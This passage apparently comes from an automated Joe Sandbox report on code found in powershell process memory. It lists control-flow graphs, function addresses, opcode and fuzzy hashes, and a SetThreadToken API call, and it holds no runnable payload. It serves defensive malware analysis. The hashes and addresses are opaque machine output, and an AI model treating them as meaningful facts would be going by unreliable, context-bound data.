                                                                                                      control_flow_graph 499 79017b8-79017da 500 79017e0-79017e5 499->500 501 7901969-7901985 499->501 502 79017e7-79017ed 500->502 503 79017fd-7901801 500->503 511 7901911 501->511 512 7901987-79019b5 501->512 504 79017f1-79017fb 502->504 505 79017ef 502->505 506 7901914-790191e 503->506 507 7901807-790180b 503->507 504->503 505->503 513 7901920-7901929 506->513 514 790192c-7901932 506->514 509 790184b 507->509 510 790180d-790181e 507->510 520 790184d-790184f 509->520 510->501 530 7901824-7901829 510->530 518 7901b04-7901b0e 512->518 519 79019bb-79019c0 512->519 515 7901934-7901936 514->515 516 7901938-7901944 514->516 521 7901946-7901966 515->521 516->521 534 7901b10-7901b15 518->534 535 7901b17-7901b21 518->535 524 79019c2-79019c8 519->524 525 79019d8-79019dc 519->525 520->506 523 7901855-7901859 520->523 523->506 531 790185f-7901863 523->531 532 79019ca 524->532 533 79019cc-79019d6 524->533 528 79019e2-79019e4 525->528 529 7901ab4-7901abe 525->529 536 79019f4 528->536 537 79019e6-79019f2 528->537 539 7901ac0-7901ac9 529->539 540 7901acc-7901ad2 529->540 541 7901841-7901849 530->541 542 790182b-7901831 530->542 543 7901865-790186e 531->543 544 7901886 531->544 532->525 533->525 534->535 547 7901aad-7901ab1 535->547 546 79019f6-79019f8 536->546 537->546 551 7901ad4-7901ad6 540->551 552 7901ad8-7901ae4 540->552 541->520 549 7901833 542->549 550 7901835-790183f 542->550 553 7901870-7901873 543->553 554 7901875-7901882 543->554 548 7901889-7901910 544->548 546->529 555 79019fe-7901a16 546->555 548->511 549->541 550->541 557 7901ae6-7901b01 551->557 552->557 558 7901884 553->558 554->558 566 7901a30-7901a34 555->566 567 7901a18-7901a1e 555->567 558->548 572 7901a3a-7901a41 566->572 570 7901a20 567->570 571 7901a22-7901a2e 567->571 570->566 571->566 573 7901a43-7901a46 572->573 574 7901a48-7901aa5 572->574 576 7901aaa 573->576 574->576 576->547
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ?l$?l
                                                                                                      • API String ID: 0-322553749
                                                                                                      • Opcode ID: 56a64b591692239a1a51107bb1ed8b4392efec419198a133f763b55ba3d4da71
                                                                                                      • Instruction ID: 4cefd05671d8f3c28184810480d882f491283b5288932a29878c069b08da9748
                                                                                                      • Opcode Fuzzy Hash: 56a64b591692239a1a51107bb1ed8b4392efec419198a133f763b55ba3d4da71
                                                                                                      • Instruction Fuzzy Hash: C8B187B1B9020DCFCB148B69D400AAEBBEAAFC5314F14C47AD415CB295DB31D941C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 08806421 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 584 8806421-8806463 585 880646b-8806497 SetThreadToken 584->585 586 88064a0-88064bd 585->586 587 8806499-880649f 585->587 587->586
                                                                                                      APIs
                                                                                                      • SetThreadToken.KERNELBASE(EFD80869), ref: 0880648A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1720262827.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_8800000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ThreadToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3254676861-0
                                                                                                      • Opcode ID: 13c3a8d48ab4ebd910f29dc04a831723d604c1dabf0f919a8de30e97255eacc6
                                                                                                      • Instruction ID: 397f6ff6654608e07f45acb5fb18f0467eebd7b1d20be02b89f9e17a420d752f
                                                                                                      • Opcode Fuzzy Hash: 13c3a8d48ab4ebd910f29dc04a831723d604c1dabf0f919a8de30e97255eacc6
                                                                                                      • Instruction Fuzzy Hash: 021125B59002488FCB50DF9AC984BDEFBF4EB88324F14841AE059A7350D774A944CFA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 08806428 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 590 8806428-8806497 SetThreadToken 592 88064a0-88064bd 590->592 593 8806499-880649f 590->593 593->592
                                                                                                      APIs
                                                                                                      • SetThreadToken.KERNELBASE(EFD80869), ref: 0880648A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1720262827.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_8800000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ThreadToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3254676861-0
                                                                                                      • Opcode ID: 73fc8bcabf8ea9b5d712bed68136f907932752430605dc057bdac06007879e29
                                                                                                      • Instruction ID: 8b6c5d17f1d710117975d42ad7b6debcb95944fd348915b08eb8fa0ca2bdc3d1
                                                                                                      • Opcode Fuzzy Hash: 73fc8bcabf8ea9b5d712bed68136f907932752430605dc057bdac06007879e29
                                                                                                      • Instruction Fuzzy Hash: 721122B59003088FCB10DF9AC984B9EFBF8EB48324F24842AD458A7250D774A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E5B9 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 596 4f5e5b9-4f5e5c0 597 4f5e622-4f5e630 596->597 598 4f5e5c2-4f5e602 596->598 599 4f5e693-4f5e6b6 597->599 600 4f5e632-4f5e689 597->600 611 4f5e6bc-4f5e6d3 599->611 612 4f5e73a-4f5e753 599->612 600->599 618 4f5e6db-4f5e738 611->618 616 4f5e755 612->616 617 4f5e75e 612->617 616->617 619 4f5e75f 617->619 618->611 618->612 619->619
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: JJl
                                                                                                      • API String ID: 0-415269788
                                                                                                      • Opcode ID: 3eafe928bc4f8a6f1d6bd1624c6178b08f9aebbf7fa82191847ab4e624003a78
                                                                                                      • Instruction ID: 3b703dc5ac4aeed68e31175662db287e12a5bf2b0cd4db44ac0975bed5e3be1a
                                                                                                      • Opcode Fuzzy Hash: 3eafe928bc4f8a6f1d6bd1624c6178b08f9aebbf7fa82191847ab4e624003a78
                                                                                                      • Instruction Fuzzy Hash: F9413B30A00209DFCB14EF69D694A9DBBF1FF49304F118569D41AAB3A4DB34AD46CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F56FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 627 4f56fe0-4f56fff 630 4f57105-4f57143 627->630 631 4f57005-4f57008 627->631 658 4f5700a call 4f57697 631->658 659 4f5700a call 4f5767c 631->659 632 4f57010-4f57022 634 4f57024 632->634 635 4f5702e-4f57043 632->635 634->635 641 4f570ce-4f570e7 635->641 642 4f57049-4f57059 635->642 647 4f570f2 641->647 648 4f570e9 641->648 643 4f57065-4f57073 call 4f5bf10 642->643 644 4f5705b 642->644 650 4f57079-4f5707d 643->650 644->643 647->630 648->647 651 4f570bd-4f570c8 650->651 652 4f5707f-4f5708f 650->652 651->641 651->642 653 4f57091-4f570a9 652->653 654 4f570ab-4f570b5 652->654 653->651 654->651 658->632 659->632
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (bq
                                                                                                      • API String ID: 0-149360118
                                                                                                      • Opcode ID: 4e2d3d36e1596aecb09033f446cacf6f58ac8a7333373e256a6b689c5a3001ea
                                                                                                      • Instruction ID: 1277574948a3c45eb8051c9ebe32d6a1a1108f9e263c605f21332e3a21f729bc
                                                                                                      • Opcode Fuzzy Hash: 4e2d3d36e1596aecb09033f446cacf6f58ac8a7333373e256a6b689c5a3001ea
                                                                                                      • Instruction Fuzzy Hash: 09411D34B041058FDB14DF69C458AAEBBF2EF8D311F1540A9E946AB3A5DB35EC02CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 660 4f5e640-4f5e6b6 667 4f5e6bc-4f5e6d3 660->667 668 4f5e73a-4f5e753 660->668 673 4f5e6db-4f5e738 667->673 671 4f5e755 668->671 672 4f5e75e 668->672 671->672 674 4f5e75f 672->674 673->667 673->668 674->674
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: JJl
                                                                                                      • API String ID: 0-415269788
                                                                                                      • Opcode ID: 883569e97512899d0c9f6f6d378c27c34da45c13ea994c23117bb7cb03516505
                                                                                                      • Instruction ID: 22787475fdf151e0c074d00f8f6df57ef7f63d1502c4a2bb25515a6c20fa3de5
                                                                                                      • Opcode Fuzzy Hash: 883569e97512899d0c9f6f6d378c27c34da45c13ea994c23117bb7cb03516505
                                                                                                      • Instruction Fuzzy Hash: 37311934A00615DFCB14DF79D594A9EBBF2FF58344F108528D41AA7394DB34AD46CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 682 4f5af98-4f5afa1 call 4f5a984 684 4f5afa6-4f5afaa 682->684 685 4f5afac-4f5afb9 684->685 686 4f5afba-4f5b055 684->686 693 4f5b057-4f5b05d 686->693 694 4f5b05e-4f5b07b 686->694 693->694
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (&^q
                                                                                                      • API String ID: 0-2067289071
                                                                                                      • Opcode ID: a32da7e60a7199d626bd17966822649b1f1ff61bfe1fdfd04a208c8425b94a48
                                                                                                      • Instruction ID: 78775499214d0956ffe368a51f07a0228cea4078149ca696b13b6c4932d75961
                                                                                                      • Opcode Fuzzy Hash: a32da7e60a7199d626bd17966822649b1f1ff61bfe1fdfd04a208c8425b94a48
                                                                                                      • Instruction Fuzzy Hash: EF21A171E042588FCB14DFAED404A9EBBF5EB88320F14846AD518A7350CA75A805CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F529F0 Relevance: .2, Instructions: 223COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 989 4f529f0-4f52a1e 990 4f52af5-4f52b08 989->990 991 4f52a24-4f52a3a 989->991 995 4f52b18-4f52b27 990->995 996 4f52b0a-4f52b16 990->996 992 4f52a3c 991->992 993 4f52a3f-4f52a52 991->993 992->993 993->990 998 4f52a58-4f52a65 993->998 1002 4f52ab4-4f52ab6 995->1002 1003 4f52b28-4f52b2c 995->1003 996->995 1000 4f52a67 998->1000 1001 4f52a6a-4f52a7c 998->1001 1000->1001 1001->990 1007 4f52a7e-4f52a88 1001->1007 1010 4f52ac0-4f52af4 1002->1010 1005 4f52b42-4f52b56 1003->1005 1006 4f52b2e-4f52b37 1003->1006 1016 4f52b58 1005->1016 1017 4f52b5b-4f52b69 1005->1017 1008 4f52c51-4f52c61 1006->1008 1009 4f52b3d-4f52b41 1006->1009 1011 4f52a96-4f52aa6 1007->1011 1012 4f52a8a-4f52a8c 1007->1012 1009->1005 1011->990 1014 4f52aa8-4f52ab2 1011->1014 1012->1011 1014->1002 1014->1010 1016->1017 1017->1008 1021 4f52b6f-4f52b79 1017->1021 1022 4f52b87-4f52b94 1021->1022 1023 4f52b7b-4f52b7d 1021->1023 1022->1008 1024 4f52b9a-4f52baa 1022->1024 1023->1022 1025 4f52bac 1024->1025 1026 4f52baf-4f52bbd 1024->1026 1025->1026 1026->1008 1028 4f52bc3-4f52bd3 1026->1028 1029 4f52bd5 1028->1029 1030 4f52bd8-4f52be5 1028->1030 1029->1030 1030->1008 1032 4f52be7-4f52bf7 1030->1032 1033 4f52bfc-4f52c08 1032->1033 1034 4f52bf9 1032->1034 1033->1008 1036 4f52c0a-4f52c24 1033->1036 1034->1033 1037 4f52c26 1036->1037 1038 4f52c29 1036->1038 1037->1038 1039 4f52c2e-4f52c38 1038->1039 1040 4f52c3d-4f52c50 1039->1040
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 44b7c64984a049d236d512cffe823e01cef448c6b00ed3e9f4911007824540dc
                                                                                                      • Instruction ID: e8a173e47d0b941f4bc50cd079104da2c0bb3c319f49f8588e083b44063d8a53
                                                                                                      • Opcode Fuzzy Hash: 44b7c64984a049d236d512cffe823e01cef448c6b00ed3e9f4911007824540dc
                                                                                                      • Instruction Fuzzy Hash: D7919A74A002499FCB15CF58C4D89AEBBB1FF49310B258699D915AB3A5C735FC42CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57740 Relevance: .2, Instructions: 159COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f952265d9bba3c468b60c4a313671c77d98ea156445d9e3bd0323a62bc115814
                                                                                                      • Instruction ID: ffcfb996027241ed92bef1a2d9c17152a9f6b2c2384f4370ca0319f74fd88ddc
                                                                                                      • Opcode Fuzzy Hash: f952265d9bba3c468b60c4a313671c77d98ea156445d9e3bd0323a62bc115814
                                                                                                      • Instruction Fuzzy Hash: 7751C4317042059FD704EB79D844A2ABBEAEFC9215F2585A9DA05CB365EB31EC02C750
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5BAB0 Relevance: .2, Instructions: 156COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21fc97d691039f2b284af3e0be9df6850315cb68555a1f924d9a16f030e6cde9
                                                                                                      • Instruction ID: 2bbbedfd0801c3cbe3d9856cf11454e5fe596e6c49cdfecf3369160ba1bd89cd
                                                                                                      • Opcode Fuzzy Hash: 21fc97d691039f2b284af3e0be9df6850315cb68555a1f924d9a16f030e6cde9
                                                                                                      • Instruction Fuzzy Hash: DC612871E00248DFCB14DFA9D58868DFBF1EF88310F15816AE919AB365EB34A846CB54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e63b1d1eadaed22c45cd2a23b37fb2e5d4434fce0ae61087ea40cc3e2f55367
                                                                                                      • Instruction ID: ac7c51a7ed0e4e08594d61e541e124097daf2ef1439e8415150d2af9f64f202c
                                                                                                      • Opcode Fuzzy Hash: 8e63b1d1eadaed22c45cd2a23b37fb2e5d4434fce0ae61087ea40cc3e2f55367
                                                                                                      • Instruction Fuzzy Hash: DE614971E00208DFDB14DFA9C58869DFBF1EF88310F15812AE919AB364EB34AC42CB54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E419 Relevance: .1, Instructions: 137COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fbc65bce07813e7e696abf2d929b3c330b13563ba5a46101ab4955e58eb68805
                                                                                                      • Instruction ID: 9d3ca587b4f74d66b93e3393c50d07676340c78ae2c5a071ca2ceccb4436bb1f
                                                                                                      • Opcode Fuzzy Hash: fbc65bce07813e7e696abf2d929b3c330b13563ba5a46101ab4955e58eb68805
                                                                                                      • Instruction Fuzzy Hash: FD512034B402058FCF14EF6CC59496ABBE6EF88314B158569E949CF365EB74ED018B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F56FB0 Relevance: .1, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 810f36fbdf4119b0a24bfef7baa92f64f574cba4ce794db2545d4140a487f7d6
                                                                                                      • Instruction ID: 75b008c70ebd15f415337122468fceb0461fd294e100f95ed533def58b61344e
                                                                                                      • Opcode Fuzzy Hash: 810f36fbdf4119b0a24bfef7baa92f64f574cba4ce794db2545d4140a487f7d6
                                                                                                      • Instruction Fuzzy Hash: 1841A134B082818FDB06DB64C954AA97FF1AF8A304F1940D9D955EB3B2DB25EC03CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E428 Relevance: .1, Instructions: 130COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c340cb1c8a06692279fc246e90e14a140923ddc871c9ba964d824754ea5edcf4
                                                                                                      • Instruction ID: 2d69d1ca1455ccb6514464fa31c4739bbe6be633372b4b48ce44872fd6d8d053
                                                                                                      • Opcode Fuzzy Hash: c340cb1c8a06692279fc246e90e14a140923ddc871c9ba964d824754ea5edcf4
                                                                                                      • Instruction Fuzzy Hash: 9E413B74B402058FCB10DF6CC69492ABBE6EFC8314B158569E949DB365EB34ED028B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07903CCC Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 89785593340efa73fc71cbdefe7a61d993dc8cca9f647f8d283f7d4b1cc2c847
                                                                                                      • Instruction ID: f8faf8ff7107c4d5e6ff5c9eed61d059b80b20690b2f2d1819ba6624e4b48efe
                                                                                                      • Opcode Fuzzy Hash: 89785593340efa73fc71cbdefe7a61d993dc8cca9f647f8d283f7d4b1cc2c847
                                                                                                      • Instruction Fuzzy Hash: 0341F3F1A20212CFCB259F28C501E6BBBA7AF85258F1885AED9009F2D2D735DD44C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5C388 Relevance: .1, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3677b3687b67e4ec5be0eba79fd0fe5bb4d8c6625d0cf08dc3ec34c49307e8af
                                                                                                      • Instruction ID: 9b3c37d0c0dcbf8d265f72c2e4e3f69121d2b8ecf81f11a7da74373412b1ba12
                                                                                                      • Opcode Fuzzy Hash: 3677b3687b67e4ec5be0eba79fd0fe5bb4d8c6625d0cf08dc3ec34c49307e8af
                                                                                                      • Instruction Fuzzy Hash: 5631AE313002009FDB05EB78E844B9AB7A2EFC4215F018239D60ECB365DF70A84ACBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AE60 Relevance: .1, Instructions: 88COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f5f50a3bbad5ce2a4d5d77de6594772f5567dfc06194c73f7f0be89e2273784
                                                                                                      • Instruction ID: 3801c64d1aeb29a34cb2f63380f4534d8024d9c24a4f7dc25bdff092f87ae794
                                                                                                      • Opcode Fuzzy Hash: 8f5f50a3bbad5ce2a4d5d77de6594772f5567dfc06194c73f7f0be89e2273784
                                                                                                      • Instruction Fuzzy Hash: B5316470E00209DFDB04DFA9C5947AE7BF6EF89310F158169E909EB364EB349C428B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AE70 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 39694926363a11821bd55efb381da7ec0469aaef0b3736de2d623bc02f286791
                                                                                                      • Instruction ID: 720d9c50992aba97709afbe62b2895e3e7ddc30c5670446d201ae2a2a0f3a022
                                                                                                      • Opcode Fuzzy Hash: 39694926363a11821bd55efb381da7ec0469aaef0b3736de2d623bc02f286791
                                                                                                      • Instruction Fuzzy Hash: B4315070E00209DFDB04DFA9D5947AEBBF6EF89310F158169E905EB364EB349C428B61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AD28 Relevance: .1, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d714f5f73cc210842f2ba511c3a30ceb45be5d82e9e8ad22f64ed287cc64bb90
                                                                                                      • Instruction ID: a484d49ea9b649e32a814efdc9bb74ea1456863827c5f89c4bf4b096371ae5eb
                                                                                                      • Opcode Fuzzy Hash: d714f5f73cc210842f2ba511c3a30ceb45be5d82e9e8ad22f64ed287cc64bb90
                                                                                                      • Instruction Fuzzy Hash: C631B7B4E002059FEB04DFB4D954ABEB7B2EF84304F1284A9CA15AF395DA35AD42CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E049 Relevance: .1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d00db0fb1944412cfc4c480ada3aede7fa9e347d39c041f726b351cabf333a9
                                                                                                      • Instruction ID: 1beb544357122aef34f2abf75a23a323abd6e3d4766fcf40006e1ab45159febb
                                                                                                      • Opcode Fuzzy Hash: 4d00db0fb1944412cfc4c480ada3aede7fa9e347d39c041f726b351cabf333a9
                                                                                                      • Instruction Fuzzy Hash: 63316B70B002048FDB14EF68D458A9DBBF2EF98314F154569D806EB3A1DF30AC86CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5E058 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0d5979f28b9b461bff9ce6a4a2a89d06babd58a66046b17680de5ee0215a05a
                                                                                                      • Instruction ID: 4115f84908da93b1bfd7712906572300b4fd5851b12ca5064304f3ff809e8130
                                                                                                      • Opcode Fuzzy Hash: b0d5979f28b9b461bff9ce6a4a2a89d06babd58a66046b17680de5ee0215a05a
                                                                                                      • Instruction Fuzzy Hash: 24316B71B002048FDB14DF69D458A9EBBF2EF98314F144529D906EB3A0DF35AC46CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AD38 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
